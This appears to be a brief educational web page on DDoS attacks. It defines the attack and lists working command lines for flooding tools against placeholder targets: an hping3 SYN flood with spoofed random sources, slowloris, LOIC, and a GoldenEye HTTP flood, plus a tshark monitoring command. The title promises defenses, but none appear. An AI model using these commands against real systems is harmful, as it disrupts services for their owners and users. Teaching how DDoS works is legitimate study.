Explore the mechanics, types, and defenses against Distributed Denial of Service (DDoS) attacks in cybersecurity.
A Distributed Denial of Service (DDoS) attack is a malicious attempt to disrupt the normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic.
Experience a simulated DDoS attack in Visualization
Common tools used in DDoS attacks and their usage (for educational purposes only)
SYN flood attack simulation
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source TARGET_IPSlowloris attack (low and slow)
python slowloris.py TARGET_IP -p 80 -s 500Low Orbit Ion Cannon (GUI-based DDoS tool)
./loic.exeHTTP DoS Test Tool
python goldeneye.py http://TARGET_URL/ -w 50 -s 100Monitor network traffic during an attack
tshark -i eth0 -f "tcp port 80" -n